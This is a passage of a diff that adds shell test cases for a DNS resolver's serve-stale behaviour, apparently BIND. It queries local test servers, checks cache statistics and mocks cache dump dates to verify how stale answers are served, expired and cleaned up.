+grep "example\..*2.*IN.*SOA" dig.out.test$n > /dev/null || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+n=$((n+1))
+echo_i "prime cache nxdomain.example TXT (max-stale-ttl default) ($n)"
+ret=0
+$DIG -p ${PORT} @10.53.0.3 nxdomain.example TXT > dig.out.test$n
+grep "status: NXDOMAIN" dig.out.test$n > /dev/null || ret=1
+grep "ANSWER: 0," dig.out.test$n > /dev/null || ret=1
+grep "example\..*2.*IN.*SOA" dig.out.test$n > /dev/null || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+n=$((n+1))
+echo_i "verify prime cache statistics (max-stale-ttl default) ($n)"
+ret=0
+rm -f ns3/named.stats
+$RNDCCMD 10.53.0.3 stats > /dev/null 2>&1
+[ -f ns3/named.stats ] || ret=1
+cp ns3/named.stats ns3/named.stats.$n
+# Check first 10 lines of Cache DB statistics. After prime queries, we expect
+# two active TXT RRsets, one active Others, one nxrrset TXT, and one NXDOMAIN.
+grep -A 10 "++ Cache DB RRsets ++" ns3/named.stats.$n > ns3/named.stats.$n.cachedb || ret=1
+grep "2 TXT" ns3/named.stats.$n.cachedb > /dev/null || ret=1
+grep "1 Others" ns3/named.stats.$n.cachedb > /dev/null || ret=1
+grep "1 !TXT" ns3/named.stats.$n.cachedb > /dev/null || ret=1
+grep "1 NXDOMAIN" ns3/named.stats.$n.cachedb > /dev/null || ret=1
+status=$((status+ret))
+if [ $ret != 0 ]; then echo_i "failed"; fi
+
+n=$((n+1))
+echo_i "disable responses from authoritative server ($n)"
+ret=0
+$DIG -p ${PORT} @10.53.0.2 txt disable > dig.out.test$n
+grep "ANSWER: 1," dig.out.test$n > /dev/null || ret=1
+grep "TXT.\"0\"" dig.out.test$n > /dev/null || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+n=$((n+1))
+echo_i "check 'rndc serve-stale status' ($n)"
+ret=0
+$RNDCCMD 10.53.0.3 serve-stale status > rndc.out.test$n 2>&1 || ret=1
+grep "_default: off (stale-answer-ttl=$stale_answer_ttl max-stale-ttl=$max_stale_ttl stale-refresh-time=30)" rndc.out.test$n > /dev/null || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+sleep 2
+
+echo_i "sending queries for tests $((n+1))-$((n+4))..."
+$DIG -p ${PORT} @10.53.0.3 data.example TXT > dig.out.test$((n+1)) &
+$DIG -p ${PORT} @10.53.0.3 othertype.example CAA > dig.out.test$((n+2)) &
+$DIG -p ${PORT} @10.53.0.3 nodata.example TXT > dig.out.test$((n+3)) &
+$DIG -p ${PORT} @10.53.0.3 nxdomain.example TXT > dig.out.test$((n+4))
+
+wait
+
+n=$((n+1))
+echo_i "check fail of data.example TXT (max-stale-ttl default) ($n)"
+ret=0
+grep "status: SERVFAIL" dig.out.test$n > /dev/null || ret=1
+grep "ANSWER: 0," dig.out.test$n > /dev/null || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+n=$((n+1))
+echo_i "check fail of othertype.example CAA (max-stale-ttl default) ($n)"
+ret=0
+grep "status: SERVFAIL" dig.out.test$n > /dev/null || ret=1
+grep "ANSWER: 0," dig.out.test$n > /dev/null || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+n=$((n+1))
+echo_i "check fail of nodata.example TXT (max-stale-ttl default) ($n)"
+ret=0
+grep "status: SERVFAIL" dig.out.test$n > /dev/null || ret=1
+grep "ANSWER: 0," dig.out.test$n > /dev/null || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+n=$((n+1))
+echo_i "check fail of nxdomain.example TXT (max-stale-ttl default) ($n)"
+ret=0
+grep "status: SERVFAIL" dig.out.test$n > /dev/null || ret=1
+grep "ANSWER: 0," dig.out.test$n > /dev/null || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+n=$((n+1))
+echo_i "verify stale cache statistics (max-stale-ttl default) ($n)"
+ret=0
+rm -f ns3/named.stats
+$RNDCCMD 10.53.0.3 stats > /dev/null 2>&1
+[ -f ns3/named.stats ] || ret=1
+cp ns3/named.stats ns3/named.stats.$n
+# Check first 10 lines of Cache DB statistics. After last queries, we expect
+# one active TXT RRset, one stale TXT, one stale nxrrset TXT, and one stale
+# NXDOMAIN.
+grep -A 10 "++ Cache DB RRsets ++" ns3/named.stats.$n > ns3/named.stats.$n.cachedb || ret=1
+grep "1 TXT" ns3/named.stats.$n.cachedb > /dev/null || ret=1
+grep "1 #TXT" ns3/named.stats.$n.cachedb > /dev/null || ret=1
+grep "1 #Others" ns3/named.stats.$n.cachedb > /dev/null || ret=1
+grep "1 #!TXT" ns3/named.stats.$n.cachedb > /dev/null || ret=1
+grep "1 #NXDOMAIN" ns3/named.stats.$n.cachedb > /dev/null || ret=1
+
+status=$((status+ret))
+if [ $ret != 0 ]; then echo_i "failed"; fi
+
+n=$((n+1))
+echo_i "check 'rndc serve-stale on' ($n)"
+ret=0
+$RNDCCMD 10.53.0.3 serve-stale on > rndc.out.test$n 2>&1 || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+n=$((n+1))
+echo_i "check 'rndc serve-stale status' ($n)"
+ret=0
+$RNDCCMD 10.53.0.3 serve-stale status > rndc.out.test$n 2>&1 || ret=1
+grep "_default: on (rndc) (stale-answer-ttl=$stale_answer_ttl max-stale-ttl=$max_stale_ttl stale-refresh-time=30)" rndc.out.test$n > /dev/null || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+sleep 2
+
+# Check that if we don't have stale data for a domain name, we will
+# not answer anything until the resolver query timeout.
+n=$((n+1))
+echo_i "check notincache.example TXT times out (max-stale-ttl default) ($n)"
+ret=0
+$DIG -p ${PORT} +tries=1 +timeout=3 @10.53.0.3 notfound.example TXT > dig.out.test$n 2>&1
+grep "connection timed out" dig.out.test$n > /dev/null || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+echo_i "sending queries for tests $((n+1))-$((n+4))..."
+$DIG -p ${PORT} @10.53.0.3 data.example TXT > dig.out.test$((n+1)) &
+$DIG -p ${PORT} @10.53.0.3 othertype.example CAA > dig.out.test$((n+2)) &
+$DIG -p ${PORT} @10.53.0.3 nodata.example TXT > dig.out.test$((n+3)) &
+$DIG -p ${PORT} @10.53.0.3 nxdomain.example TXT > dig.out.test$((n+4)) &
+$DIG -p ${PORT} @10.53.0.3 notfound.example TXT > dig.out.test$((n+5))
+
+wait
+
+n=$((n+1))
+echo_i "check data.example TXT (max-stale-ttl default) ($n)"
+ret=0
+grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1
+grep "ANSWER: 1," dig.out.test$n > /dev/null || ret=1
+grep "data\.example\..*30.*IN.*TXT.*A text record with a 2 second ttl" dig.out.test$n > /dev/null || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+n=$((n+1))
+echo_i "check othertype.example CAA (max-stale-ttl default) ($n)"
+ret=0
+grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1
+grep "ANSWER: 1," dig.out.test$n > /dev/null || ret=1
+grep "example\..*30.*IN.*CAA.*0.*issue" dig.out.test$n > /dev/null || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+n=$((n+1))
+echo_i "check nodata.example TXT (max-stale-ttl default) ($n)"
+ret=0
+grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1
+grep "ANSWER: 0," dig.out.test$n > /dev/null || ret=1
+grep "example\..*30.*IN.*SOA" dig.out.test$n > /dev/null || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+n=$((n+1))
+echo_i "check nxdomain.example TXT (max-stale-ttl default) ($n)"
+ret=0
+grep "status: NXDOMAIN" dig.out.test$n > /dev/null || ret=1
+grep "ANSWER: 0," dig.out.test$n > /dev/null || ret=1
+grep "example\..*30.*IN.*SOA" dig.out.test$n > /dev/null || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+# The notfound.example check is different than nxdomain.example because
+# we didn't send a prime query to add notfound.example to the cache.
+n=$((n+1))
+echo_i "check notfound.example TXT (max-stale-ttl default) ($n)"
+ret=0
+grep "status: SERVFAIL" dig.out.test$n > /dev/null || ret=1
+grep "ANSWER: 0," dig.out.test$n > /dev/null || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+#
+# Now test server with serve-stale answers disabled.
+#
+echo_i "test server with serve-stale disabled"
+
+n=$((n+1))
+echo_i "enable responses from authoritative server ($n)"
+ret=0
+$DIG -p ${PORT} @10.53.0.2 txt enable > dig.out.test$n
+grep "ANSWER: 1," dig.out.test$n > /dev/null || ret=1
+grep "TXT.\"1\"" dig.out.test$n > /dev/null || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+n=$((n+1))
+echo_i "prime cache longttl.example TTL (serve-stale answers disabled) ($n)"
+ret=0
+$DIG -p ${PORT} @10.53.0.4 longttl.example TXT > dig.out.test$n
+grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1
+grep "ANSWER: 1," dig.out.test$n > /dev/null || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+n=$((n+1))
+echo_i "prime cache data.example TTL (serve-stale answers disabled) ($n)"
+ret=0
+$DIG -p ${PORT} @10.53.0.4 data.example TXT > dig.out.test$n
+grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1
+grep "ANSWER: 1," dig.out.test$n > /dev/null || ret=1
+grep "data\.example\..*2.*IN.*TXT.*A text record with a 2 second ttl" dig.out.test$n > /dev/null || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+n=$((n+1))
+echo_i "prime cache othertype.example CAA (serve-stale answers disabled) ($n)"
+ret=0
+$DIG -p ${PORT} @10.53.0.4 othertype.example CAA > dig.out.test$n
+grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1
+grep "ANSWER: 1," dig.out.test$n > /dev/null || ret=1
+grep "othertype\.example\..*2.*IN.*CAA.*0.*issue" dig.out.test$n > /dev/null || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+n=$((n+1))
+echo_i "prime cache nodata.example TXT (serve-stale answers 
disabled) ($n)"
+ret=0
+$DIG -p ${PORT} @10.53.0.4 nodata.example TXT > dig.out.test$n
+grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1
+grep "ANSWER: 0," dig.out.test$n > /dev/null || ret=1
+grep "example\..*2.*IN.*SOA" dig.out.test$n > /dev/null || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+n=$((n+1))
+echo_i "prime cache nxdomain.example TXT (serve-stale answers disabled) ($n)"
+ret=0
+$DIG -p ${PORT} @10.53.0.4 nxdomain.example TXT > dig.out.test$n
+grep "status: NXDOMAIN" dig.out.test$n > /dev/null || ret=1
+grep "ANSWER: 0," dig.out.test$n > /dev/null || ret=1
+grep "example\..*2.*IN.*SOA" dig.out.test$n > /dev/null || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+n=$((n+1))
+echo_i "verify prime cache statistics (serve-stale answers disabled) ($n)"
+ret=0
+rm -f ns4/named.stats
+$RNDCCMD 10.53.0.4 stats > /dev/null 2>&1
+[ -f ns4/named.stats ] || ret=1
+cp ns4/named.stats ns4/named.stats.$n
+# Check first 10 lines of Cache DB statistics. After prime queries, we expect
+# two active TXT RRsets, one active Others, one nxrrset TXT, and one NXDOMAIN.
+grep -A 10 "++ Cache DB RRsets ++" ns4/named.stats.$n > ns4/named.stats.$n.cachedb || ret=1
+grep "2 TXT" ns4/named.stats.$n.cachedb > /dev/null || ret=1
+grep "1 Others" ns4/named.stats.$n.cachedb > /dev/null || ret=1
+grep "1 !TXT" ns4/named.stats.$n.cachedb > /dev/null || ret=1
+grep "1 NXDOMAIN" ns4/named.stats.$n.cachedb > /dev/null || ret=1
+status=$((status+ret))
+if [ $ret != 0 ]; then echo_i "failed"; fi
+
+n=$((n+1))
+echo_i "disable responses from authoritative server ($n)"
+ret=0
+$DIG -p ${PORT} @10.53.0.2 txt disable > dig.out.test$n
+grep "ANSWER: 1," dig.out.test$n > /dev/null || ret=1
+grep "TXT.\"0\"" dig.out.test$n > /dev/null || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+n=$((n+1))
+echo_i "check 'rndc serve-stale status' ($n)"
+ret=0
+$RNDCCMD 10.53.0.4 serve-stale status > rndc.out.test$n 2>&1 || ret=1
+grep "_default: off (stale-answer-ttl=$stale_answer_ttl max-stale-ttl=$max_stale_ttl stale-refresh-time=30)" rndc.out.test$n > /dev/null || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+sleep 2
+
+echo_i "sending queries for tests $((n+1))-$((n+4))..."
+$DIG -p ${PORT} @10.53.0.4 data.example TXT > dig.out.test$((n+1)) &
+$DIG -p ${PORT} @10.53.0.4 othertype.example CAA > dig.out.test$((n+2)) &
+$DIG -p ${PORT} @10.53.0.4 nodata.example TXT > dig.out.test$((n+3)) &
+$DIG -p ${PORT} @10.53.0.4 nxdomain.example TXT > dig.out.test$((n+4))
+
+wait
+
+n=$((n+1))
+echo_i "check fail of data.example TXT (serve-stale answers disabled) ($n)"
+ret=0
+grep "status: SERVFAIL" dig.out.test$n > /dev/null || ret=1
+grep "ANSWER: 0," dig.out.test$n > /dev/null || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+n=$((n+1))
+echo_i "check fail of othertype.example TXT (serve-stale answers disabled) ($n)"
+ret=0
+grep "status: SERVFAIL" dig.out.test$n > /dev/null || ret=1
+grep "ANSWER: 0," dig.out.test$n > /dev/null || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+n=$((n+1))
+echo_i "check fail of nodata.example TXT (serve-stale answers disabled) ($n)"
+ret=0
+grep "status: SERVFAIL" dig.out.test$n > /dev/null || ret=1
+grep "ANSWER: 0," dig.out.test$n > /dev/null || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+n=$((n+1))
+echo_i "check fail of nxdomain.example TXT (serve-stale answers disabled) ($n)"
+ret=0
+grep "status: SERVFAIL" dig.out.test$n > /dev/null || ret=1
+grep "ANSWER: 0," dig.out.test$n > /dev/null || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+n=$((n+1))
+echo_i "verify stale cache statistics (serve-stale answers disabled) ($n)"
+ret=0
+rm -f ns4/named.stats
+$RNDCCMD 10.53.0.4 stats > /dev/null 2>&1
+[ -f ns4/named.stats ] || ret=1
+cp ns4/named.stats ns4/named.stats.$n
+# Check first 10 lines of Cache DB statistics. After last queries, we expect
+# one active TXT RRset, one stale TXT, one stale nxrrset TXT, and one stale
+# NXDOMAIN.
+grep -A 10 "++ Cache DB RRsets ++" ns4/named.stats.$n > ns4/named.stats.$n.cachedb || ret=1
+grep "1 TXT" ns4/named.stats.$n.cachedb > /dev/null || ret=1
+grep "1 #TXT" ns4/named.stats.$n.cachedb > /dev/null || ret=1
+grep "1 #Others" ns4/named.stats.$n.cachedb > /dev/null || ret=1
+grep "1 #!TXT" ns4/named.stats.$n.cachedb > /dev/null || ret=1
+grep "1 #NXDOMAIN" ns4/named.stats.$n.cachedb > /dev/null || ret=1
+status=$((status+ret))
+if [ $ret != 0 ]; then echo_i "failed"; fi
+
+# Dump the cache.
+n=$((n+1))
+echo_i "dump the cache (serve-stale answers disabled) ($n)"
+ret=0
+rndc_dumpdb ns4 -cache || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+echo_i "stop ns4"
+stop_server --use-rndc --port ${CONTROLPORT} ns4
+
+# Load the cache as if it was five minutes (RBTDB_VIRTUAL) older. Since
+# max-stale-ttl defaults to a week, we need to adjust the date by one week and
+# five minutes.
+LASTWEEK=`TZ=UTC perl -e 'my $now = time();
+ my $oneWeekAgo = $now - 604800;
+ my $fiveMinutesAgo = $oneWeekAgo - 300;
+ my ($s, $m, $h, $d, $mo, $y) = (localtime($fiveMinutesAgo))[0, 1, 2, 3, 4, 5];
+ printf("%04d%02d%02d%02d%02d%02d", $y+1900, $mo+1, $d, $h, $m, $s);'`
+
+echo_i "mock the cache date to $LASTWEEK (serve-stale answers disabled) ($n)"
+ret=0
+sed -E "s/DATE [0-9]{14}/DATE $LASTWEEK/g" ns4/named_dump.db.test$n > ns4/named_dump.db.out || ret=1
+cp ns4/named_dump.db.out ns4/named_dump.db
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+echo_i "start ns4"
+start_server --noclean --restart --port ${PORT} ns4
+
+n=$((n+1))
+echo_i "verify ancient cache statistics (serve-stale answers disabled) ($n)"
+ret=0
+rm -f ns4/named.stats
+$RNDCCMD 10.53.0.4 stats #> /dev/null 2>&1
+[ -f ns4/named.stats ] || ret=1
+cp ns4/named.stats ns4/named.stats.$n
+# Check first 10 lines of Cache DB statistics. After last queries, we expect
+# everything to be removed or scheduled to be removed.
+grep -A 10 "++ Cache DB RRsets ++" ns4/named.stats.$n > ns4/named.stats.$n.cachedb || ret=1
+grep "#TXT" ns4/named.stats.$n.cachedb > /dev/null && ret=1
+grep "#Others" ns4/named.stats.$n.cachedb > /dev/null && ret=1
+grep "#!TXT" ns4/named.stats.$n.cachedb > /dev/null && ret=1
+grep "#NXDOMAIN" ns4/named.stats.$n.cachedb > /dev/null && ret=1
+status=$((status+ret))
+if [ $ret != 0 ]; then echo_i "failed"; fi
+
+#
+# Test the server with stale-cache disabled.
+#
+echo_i "test server with serve-stale cache disabled"
+
+n=$((n+1))
+echo_i "enable responses from authoritative server ($n)"
+ret=0
+$DIG -p ${PORT} @10.53.0.2 txt enable > dig.out.test$n
+grep "ANSWER: 1," dig.out.test$n > /dev/null || ret=1
+grep "TXT.\"1\"" dig.out.test$n > /dev/null || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+n=$((n+1))
+echo_i "prime cache longttl.example TXT (serve-stale cache disabled) ($n)"
+ret=0
+$DIG -p ${PORT} @10.53.0.5 longttl.example TXT > dig.out.test$n
+grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1
+grep "ANSWER: 1," dig.out.test$n > /dev/null || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+n=$((n+1))
+echo_i "prime cache data.example TXT (serve-stale cache disabled) ($n)"
+ret=0
+$DIG -p ${PORT} @10.53.0.5 data.example TXT > dig.out.test$n
+grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1
+grep "ANSWER: 1," dig.out.test$n > /dev/null || ret=1
+grep "data\.example\..*2.*IN.*TXT.*A text record with a 2 second ttl" dig.out.test$n > /dev/null || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+n=$((n+1))
+echo_i "prime cache othertype.example CAA (serve-stale cache disabled) ($n)"
+ret=0
+$DIG -p ${PORT} @10.53.0.5 othertype.example CAA > dig.out.test$n
+grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1
+grep "ANSWER: 1," dig.out.test$n > /dev/null || ret=1
+grep "othertype\.example\..*2.*IN.*CAA.*0.*issue" dig.out.test$n > /dev/null || ret=1
+if [ 
$ret != 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+n=$((n+1))
+echo_i "prime cache nodata.example TXT (serve-stale cache disabled) ($n)"
+ret=0
+$DIG -p ${PORT} @10.53.0.5 nodata.example TXT > dig.out.test$n
+grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1
+grep "ANSWER: 0," dig.out.test$n > /dev/null || ret=1
+grep "example\..*2.*IN.*SOA" dig.out.test$n > /dev/null || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+n=$((n+1))
+echo_i "prime cache nxdomain.example TXT (serve-stale cache disabled) ($n)"
+ret=0
+$DIG -p ${PORT} @10.53.0.5 nxdomain.example TXT > dig.out.test$n
+grep "status: NXDOMAIN" dig.out.test$n > /dev/null || ret=1
+grep "ANSWER: 0," dig.out.test$n > /dev/null || ret=1
+grep "example\..*2.*IN.*SOA" dig.out.test$n > /dev/null || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+n=$((n+1))
+echo_i "verify prime cache statistics (serve-stale cache disabled) ($n)"
+ret=0
+rm -f ns5/named.stats
+$RNDCCMD 10.53.0.5 stats > /dev/null 2>&1
+[ -f ns5/named.stats ] || ret=1
+cp ns5/named.stats ns5/named.stats.$n
+# Check first 10 lines of Cache DB statistics. After serve-stale queries,
+# we expect two active TXT RRsets, one active Others, one nxrrset TXT, and
+# one NXDOMAIN.
+grep -A 10 "++ Cache DB RRsets ++" ns5/named.stats.$n > ns5/named.stats.$n.cachedb || ret=1
+grep "2 TXT" ns5/named.stats.$n.cachedb > /dev/null || ret=1
+grep "1 Others" ns5/named.stats.$n.cachedb > /dev/null || ret=1
+grep "1 !TXT" ns5/named.stats.$n.cachedb > /dev/null || ret=1
+grep "1 NXDOMAIN" ns5/named.stats.$n.cachedb > /dev/null || ret=1
+status=$((status+ret))
+if [ $ret != 0 ]; then echo_i "failed"; fi
+
+n=$((n+1))
+echo_i "disable responses from authoritative server ($n)"
+ret=0
+$DIG -p ${PORT} @10.53.0.2 txt disable > dig.out.test$n
+grep "ANSWER: 1," dig.out.test$n > /dev/null || ret=1
+grep "TXT.\"0\"" dig.out.test$n > /dev/null || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+n=$((n+1))
+echo_i "check 'rndc serve-stale status' ($n)"
+ret=0
+$RNDCCMD 10.53.0.5 serve-stale status > rndc.out.test$n 2>&1 || ret=1
+grep "_default: off (not-cached)" rndc.out.test$n > /dev/null || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+sleep 2
+
+echo_i "sending queries for tests $((n+1))-$((n+4))..."
+$DIG -p ${PORT} @10.53.0.5 data.example TXT > dig.out.test$((n+1)) &
+$DIG -p ${PORT} @10.53.0.5 othertype.example CAA > dig.out.test$((n+2)) &
+$DIG -p ${PORT} @10.53.0.5 nodata.example TXT > dig.out.test$((n+3)) &
+$DIG -p ${PORT} @10.53.0.5 nxdomain.example TXT > dig.out.test$((n+4))
+
+wait
+
+n=$((n+1))
+echo_i "check fail of data.example TXT (serve-stale cache disabled) ($n)"
+ret=0
+grep "status: SERVFAIL" dig.out.test$n > /dev/null || ret=1
+grep "ANSWER: 0," dig.out.test$n > /dev/null || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+n=$((n+1))
+echo_i "check fail of othertype.example CAA (serve-stale cache disabled) ($n)"
+ret=0
+grep "status: SERVFAIL" dig.out.test$n > /dev/null || ret=1
+grep "ANSWER: 0," dig.out.test$n > /dev/null || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+n=$((n+1))
+echo_i "check fail of nodata.example TXT (serve-stale cache disabled) ($n)"
+ret=0
+grep "status: SERVFAIL" dig.out.test$n > /dev/null || ret=1
+grep "ANSWER: 0," dig.out.test$n > /dev/null || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+n=$((n+1))
+echo_i "check fail of nxdomain.example TXT (serve-stale cache disabled) ($n)"
+ret=0
+grep "status: SERVFAIL" dig.out.test$n > /dev/null || ret=1
+grep "ANSWER: 0," dig.out.test$n > /dev/null || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+n=$((n+1))
+echo_i "verify stale cache statistics (serve-stale cache disabled) ($n)"
+ret=0
+rm -f ns5/named.stats
+$RNDCCMD 10.53.0.5 stats > /dev/null 2>&1
+[ -f ns5/named.stats ] || ret=1
+cp ns5/named.stats ns5/named.stats.$n
+# Check first 10 lines of Cache DB statistics. After serve-stale queries,
+# we expect one active TXT (longttl) and the rest to be expired from cache,
+# but since we keep everything for 5 minutes (RBTDB_VIRTUAL) in the cache
+# after expiry, they still show up in the stats.
+grep -A 10 "++ Cache DB RRsets ++" ns5/named.stats.$n > ns5/named.stats.$n.cachedb || ret=1
+grep -F "1 Others" ns5/named.stats.$n.cachedb > /dev/null || ret=1
+grep -F "2 TXT" ns5/named.stats.$n.cachedb > /dev/null || ret=1
+grep -F "1 !TXT" ns5/named.stats.$n.cachedb > /dev/null || ret=1
+grep -F "1 NXDOMAIN" ns5/named.stats.$n.cachedb > /dev/null || ret=1
+status=$((status+ret))
+if [ $ret != 0 ]; then echo_i "failed"; fi
+
+# Dump the cache.
+n=$((n+1))
+echo_i "dump the cache (serve-stale cache disabled) ($n)"
+ret=0
+rndc_dumpdb ns5 || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+# Check that expired records are not dumped.
+ret=0
+grep "; expired since .* (awaiting cleanup)" ns5/named_dump.db.test$n && ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+# Dump the cache including expired entries.
+n=$((n+1))
+echo_i "dump the cache including expired entries (serve-stale cache disabled) ($n)"
+ret=0
+rndc_dumpdb ns5 -expired || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+# Check that expired records are dumped.
+echo_i "check rndc dump expired data.example ($n)"
+ret=0
+awk '/; expired/ { x=$0; getline; print x, $0}' ns5/named_dump.db.test$n |
+ grep "; expired since .* (awaiting cleanup) data\.example\..*A text record with a 2 second ttl" > /dev/null 2>&1 || ret=1
+awk '/; expired/ { x=$0; getline; print x, $0}' ns5/named_dump.db.test$n |
+ grep "; expired since .* (awaiting cleanup) nodata\.example\." > /dev/null 2>&1 || ret=1
+awk '/; expired/ { x=$0; getline; print x, $0}' ns5/named_dump.db.test$n |
+ grep "; expired since .* (awaiting cleanup) nxdomain\.example\." > /dev/null 2>&1 || ret=1
+awk '/; expired/ { x=$0; getline; print x, $0}' ns5/named_dump.db.test$n |
+ grep "; expired since .* (awaiting cleanup) othertype\.example\." > /dev/null 2>&1 || ret=1
+# Also make sure the not expired data does not have an expired comment.
+awk '/; answer/ { x=$0; getline; print x, $0}' ns5/named_dump.db.test$n |
+ grep "; answer longttl\.example.*A text record with a 600 second ttl" > /dev/null 2>&1 || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+echo_i "stop ns5"
+stop_server --use-rndc --port ${CONTROLPORT} ns5
+
+# Load the cache as if it was five minutes (RBTDB_VIRTUAL) older.
+cp ns5/named_dump.db.test$n ns5/named_dump.db
+FIVEMINUTESAGO=`TZ=UTC perl -e 'my $now = time();
+ my $fiveMinutesAgo = 300;
+ my ($s, $m, $h, $d, $mo, $y) = (localtime($fiveMinutesAgo))[0, 1, 2, 3, 4, 5];
+ printf("%04d%02d%02d%02d%02d%02d", $y+1900, $mo+1, $d, $h, $m, $s);'`
+
+n=$((n+1))
+echo_i "mock the cache date to $FIVEMINUTESAGO (serve-stale cache disabled) ($n)"
+ret=0
+sed -E "s/DATE [0-9]{14}/DATE $FIVEMINUTESAGO/g" ns5/named_dump.db > ns5/named_dump.db.out || ret=1
+cp ns5/named_dump.db.out ns5/named_dump.db
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+echo_i "start ns5"
+start_server --noclean --restart --port ${PORT} ns5
+
+n=$((n+1))
+echo_i "verify ancient cache statistics (serve-stale cache disabled) ($n)"
+ret=0
+rm -f ns5/named.stats
+$RNDCCMD 10.53.0.5 stats #> /dev/null 2>&1
+[ -f ns5/named.stats ] || ret=1
+cp ns5/named.stats ns5/named.stats.$n
+# Check first 10 lines of Cache DB statistics. After last queries, we expect
+# everything to be removed or scheduled to be removed.
+grep -A 10 "++ Cache DB RRsets ++" ns5/named.stats.$n > ns5/named.stats.$n.cachedb || ret=1
+grep -F "#TXT" ns5/named.stats.$n.cachedb > /dev/null && ret=1
+grep -F "#Others" ns5/named.stats.$n.cachedb > /dev/null && ret=1
+grep -F "#!TXT" ns5/named.stats.$n.cachedb > /dev/null && ret=1
+grep -F "#NXDOMAIN" ns5/named.stats.$n.cachedb > /dev/null && ret=1
+status=$((status+ret))
+if [ $ret != 0 ]; then echo_i "failed"; fi
+
+################################################
+# Test for stale-answer-client-timeout (1.8s). #
+################################################
+echo_i "test stale-answer-client-timeout (1.8)"
+
+n=$((n+1))
+echo_i "updating ns3/named.conf ($n)"
+ret=0
+copy_setports ns3/named2.conf.in ns3/named.conf
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+echo_i "restart ns3"
+stop_server --use-rndc --port ${CONTROLPORT} ns3
+start_server --noclean --restart --port ${PORT} ns3
+
+n=$((n+1))
+echo_i "check 'rndc serve-stale status' ($n)"
+ret=0
+$RNDCCMD 10.53.0.3 serve-stale status > rndc.out.test$n 2>&1 || ret=1
+grep '_default: on (stale-answer-ttl=3 max-stale-ttl=3600 stale-refresh-time=0)' rndc.out.test$n > /dev/null || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+n=$((n+1))
+echo_i "enable responses from authoritative server ($n)"
+ret=0
